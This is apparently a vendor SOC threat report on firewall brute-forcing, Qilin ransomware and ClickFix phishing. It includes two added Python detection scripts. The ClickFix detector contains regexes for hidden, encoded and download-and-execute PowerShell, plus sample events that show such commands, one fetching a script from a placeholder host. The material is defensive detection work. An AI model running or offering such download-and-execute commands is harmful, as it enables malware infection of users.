SOC Threat Radar — April 2026
The latest threats facing businesses seen by Barracuda Managed XDR
Takeaways
- A spike in brute-force attacks against network devices, with 88% coming from the Middle East
- Qilin ransomware unfolds in minutes after malware is released
- A rise in ClickFix phishing incidents
A rise in brute-force authentication attacks targeting network devices
What’s happening?
Between January and March 2026, Barracuda Managed XDR recorded a sharp rise in confirmed brute-force authentication attempts targeting SonicWall and FortiGate devices. These alerts accounted for over half (56%) of all confirmed incidents seen by the SOC in the February-March period.
The activity was highly concentrated, with around 88% originating from the Middle East. Most attempts were unsuccessful, either blocked outright by security tools or directed at invalid usernames.
Attackers are aggressively scanning and testing perimeter devices for weak or exposed credentials. Even when attacks fail, persistent probing raises the risk that a single weak password or misconfiguration could lead to compromise.
Your organization may be at risk if you have:
- Inadequate access and authentication controls, such as no multifactor authentication (MFA)
- Weak or reused passwords on firewall or VPN accounts
- Internet-facing devices that are not monitored for repeated login failures
- Any legacy or unused/inactive (‘ghost’) accounts left enabled
To protect your organization:
- Enforce strong, unique passwords on all network and security devices.
- Enable MFA on all VPNs, firewalls and remote access services.
- Monitor and flag any repeated failed login attempts.
- Restrict management interfaces to trusted IP ranges wherever possible.
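The "monitor and flag repeated failed login attempts" recommendation, as an added detection example that is not Barracuda's or any vendor's code: it parses constructed firewall syslog lines (loosely modelled on FortiGate-style key=value events; the field names `srcip`, `status`, `reason` and `user` are assumptions), keeps a sliding window of failures per source IP, and also counts failures against invalid usernames, which the report notes is common in this campaign.

```python
"""Flag repeated failed admin logins per source IP in firewall syslog.
Added example, not Barracuda's or any vendor's code. The log lines are
constructed and only loosely modelled on FortiGate-style key=value events;
field names (srcip, status, reason, user) are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse(line):
    """One key=value syslog line -> dict with surrounding quotes stripped."""
    return {k: v.strip('"') for k, v in KV.findall(line)}

def failed_logins(lines, threshold=5, window_s=300):
    """Return {srcip: summary} for IPs with >= threshold login failures inside
    a sliding window_s-second window. The summary also counts failures that hit
    an invalid username, a marker of untargeted credential guessing."""
    recent, users, bad_names, alerts = defaultdict(deque), defaultdict(set), defaultdict(int), {}
    for line in lines:
        ev = parse(line)
        if ev.get("action") != "login" or ev.get("status") != "failed":
            continue                      # only failed login events matter here
        ts = datetime.fromisoformat(f'{ev["date"]}T{ev["time"]}')
        ip = ev["srcip"]
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()                   # drop failures older than the window
        users[ip].add(ev.get("user", "?"))
        bad_names[ip] += int(ev.get("reason") == "name_invalid")
        if len(q) >= threshold:
            alerts[ip] = {"failures_in_window": len(q),
                          "distinct_users": len(users[ip]),
                          "invalid_username_hits": bad_names[ip]}
    return alerts

def _ev(t, user, ip, reason):
    return f'date=2026-02-03 time={t} action="login" status="failed" user="{user}" srcip={ip} reason="{reason}"'

SAMPLE_LOG = [  # constructed events, not real device output
    _ev("10:00:01", "admin", "203.0.113.5", "passwd_invalid"),
    _ev("10:00:09", "admin", "203.0.113.5", "passwd_invalid"),
    _ev("10:00:17", "root", "203.0.113.5", "name_invalid"),
    _ev("10:00:25", "support", "203.0.113.5", "name_invalid"),
    _ev("10:00:33", "admin", "203.0.113.5", "passwd_invalid"),
    _ev("10:00:41", "test", "203.0.113.5", "name_invalid"),
    _ev("10:03:00", "jsmith", "198.51.100.7", "passwd_invalid"),
    'date=2026-02-03 time=10:03:30 action="login" status="success" user="jsmith" srcip=198.51.100.7',
]
```

Calling `failed_logins(SAMPLE_LOG)` flags only 203.0.113.5 (six failures in under a minute, four different usernames, three of them invalid), while the single failure from 198.51.100.7 followed by a success stays below the threshold.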
Qilin ransomware unfolds in minutes after malware release
What’s happening?
Qilin is currently among the most active ransomware groups. It is also very fast. Barracuda’s SOC teams mitigated a Qilin attack that involved a vulnerable endpoint compromised by attackers. Once the malware executed, the attack progressed at speed, with large-scale file changes and suspicious execution activity. The team promptly quarantined the network to contain the attack and prevent further spread.
Your organization may be at risk of a ransomware incident if you have:
- A lack of visibility across the IT network to spot unusual or suspicious activity such as lateral movement or file tampering — especially when linked to user actions
- Inadequate access and authentication controls, such as no multifactor authentication (MFA)
- No regular security awareness training for employees to teach them about the latest phishing and social engineering scams designed to steal identities and access credentials
- Too many employees with high privilege access rights
- Unprotected or poorly monitored endpoints
- Weak backup and recovery processes
To protect your organization:
- Monitor for sudden surges in file modification or encryption activity.
- Ensure backups are recent, tested and isolated from the primary network.
- Enable rapid containment and isolation of affected devices to limit spread.
- Educate employees on how to spot identity theft attacks.
- Deploy endpoint security that detects ransomware by behavior, not just signatures, and can contain incidents that are progressing at speed, such as Barracuda Managed XDR Endpoint Security.
A rise in ClickFix-style infections
What’s happening?
Barracuda Managed XDR’s security operations center (SOC) teams are seeing a rise in ClickFix-style attacks targeting organizations. ClickFix uses social engineering to trick a target into clicking on something or copy-pasting text into a box to ‘fix’ a problem; what actually runs is a malicious command or file. The attacks often start with a phishing email.
ClickFix attacks exploit user trust and anxiety. The attackers use familiar elements and language such as pop-ups, prompts and ‘running a fix.’ Because ClickFix attacks rely on duping users into entering the malicious commands themselves, they are harder for automated security systems to spot.
Your organization may be at risk if you:
- Don’t run regular security awareness training for employees to teach them about the latest phishing and social engineering tricks
- Lack effective permission controls — resulting in too many users who can run scripts or commands without restriction
- Have limited visibility into command-line or script-based activity on endpoints
- Don’t have the tools to consistently monitor for or recognize unusual process behavior
To protect your organization:
- Train employees to check with IT first if they receive unexpected instructions to ‘fix’ problems by clicking a link, copy-pasting content into a box or running commands or files.
- Restrict who can run PowerShell, scripts or command-line tools.
- Use security tools that monitor for abnormal process behavior, especially so-called ‘parent-child’ process anomalies, and that can correlate user actions with endpoint activity to quickly validate whether there has been malicious execution.
- Barracuda Managed XDR Endpoint Security tools flag unusual behavior, such as suspicious PowerShell or command-line activity or programs launching other programs in unexpected ways.
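The ‘parent-child’ anomaly check described above, as an added example that is not Barracuda's detection logic: it scores constructed process-creation events (Sysmon-like field names `ParentImage`, `Image`, `CommandLine`, `User` and `Host` are assumptions) by whether a shell was spawned from a user-facing app such as the Run box or a browser and by command-line traits of pasted one-liners, and keeps user and host on each hit so the alert can be correlated with what the user was doing.

```python
"""Score process-creation events for ClickFix-style parent-child anomalies.
Added example, not Barracuda's detection logic. Events are constructed and use
Sysmon-like field names (ParentImage, Image, CommandLine, User) as assumptions."""
import re

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
# Parents from which a shell launch is unexpected: the Run box (explorer.exe),
# browsers and Office apps are where a pasted ClickFix "fix" gets executed.
USER_APPS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
             "winword.exe", "excel.exe", "outlook.exe"}
MARKERS = {  # command-line traits of pasted one-liners, one point each
    "encoded": re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I),
    "hidden": re.compile(r"\s-w(indowstyle)?\s+hidden", re.I),
    "download": re.compile(r"downloadstring|invoke-webrequest|\biwr\b|https?://", re.I),
    "exec": re.compile(r"invoke-expression|\biex\b", re.I),
}

def base(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons) for one event; non-shell children score 0."""
    child, parent = base(ev["Image"]), base(ev["ParentImage"])
    if child not in SHELLS:
        return 0, []
    reasons = [f"{child} spawned by user app {parent}"] if parent in USER_APPS else []
    reasons += [n for n, rx in MARKERS.items() if rx.search(ev.get("CommandLine", ""))]
    return len(reasons), reasons

def find_clickfix(events, min_score=2):
    """Events at or above min_score, keeping user and host for correlation."""
    hits = []
    for ev in events:
        s, why = score_event(ev)
        if s >= min_score:
            hits.append({"User": ev["User"], "Host": ev["Host"], "score": s, "reasons": why})
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed telemetry, not real events
    {"Host": "WS-07", "User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -enc PLACEHOLDER_BASE64"},   # pasted into the Run box
    {"Host": "WS-07", "User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell"},                                     # user opened a console
    {"Host": "WS-09", "User": "CORP\\carol", "ParentImage": r"C:\Program Files\msedge.exe", "Image": PS,
     "CommandLine": "powershell -c Invoke-WebRequest https://example.invalid/fix.ps1"},
    {"Host": "SRV-01", "User": "SYSTEM", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
]
```

`find_clickfix(EVENTS)` returns the two WS hits (hidden encoded PowerShell from explorer.exe, and a browser-launched download) and ignores a user simply opening a console and a service-spawned svchost.exe, which is the distinction a tuned parent-child rule has to make.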
How Barracuda Managed XDR can help your organization
Barracuda Managed XDR delivers advanced protection against the threats identified in this report by combining cutting-edge technology with expert SOC oversight. With real-time threat intelligence, automated responses, a 24/7/365 SOC team, and XDR Managed Vulnerability Security that identifies security gaps and oversights, Barracuda Managed XDR ensures comprehensive, proactive protection across your network, cloud, email, servers, and endpoints, giving you the confidence to stay ahead of evolving threats.
For further information on how we can help, please get in touch with the Barracuda Managed XDR team.